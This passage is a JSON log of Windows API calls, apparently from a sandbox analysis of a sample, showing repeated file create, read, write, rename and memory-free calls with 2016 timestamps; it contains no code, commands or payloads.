17:41:44,055", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,055", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,076", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,086", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,086", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,096", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,096", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,106", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,106", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,116", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,116", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,126", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,126", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,136", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,146", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,316", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,316", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,316", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,316", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,326", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,326", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,336", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,376", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,396", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,426", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,456", 